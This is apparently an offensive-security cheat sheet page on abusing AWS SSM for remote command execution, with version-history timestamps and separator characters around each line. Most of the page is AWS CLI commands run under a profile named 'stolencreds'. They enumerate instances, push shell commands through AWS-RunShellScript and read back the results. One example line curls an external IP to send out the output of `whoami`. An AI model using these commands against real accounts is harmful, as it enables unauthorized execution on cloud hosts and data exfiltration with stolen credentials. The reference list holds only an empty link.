2024-01-01 23:01:14 +00:00
|
|
|
# AWS - Service - SSM
|
2023-12-31 17:55:37 +00:00
|
|
|
|
|
|
|
## Command execution
|
|
|
|
|
|
|
|
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
|
|
|
|
|
|
|
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
|
|
|
|
|
|
|
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
|
|
|
* Windows Server 2016 and 2019
|
|
|
|
* Amazon Linux
|
|
|
|
* Amazon Linux 2
|
|
|
|
* Ubuntu Server 16.04
|
|
|
|
* Ubuntu Server 18.04
|
|
|
|
* Amazon ECS-Optimized
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
|
|
|
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
|
|
|
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
|
|
|
|
|
|
|
e.g:
|
|
|
|
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## References
|
|
|
|
|
|
|
|
* []()
|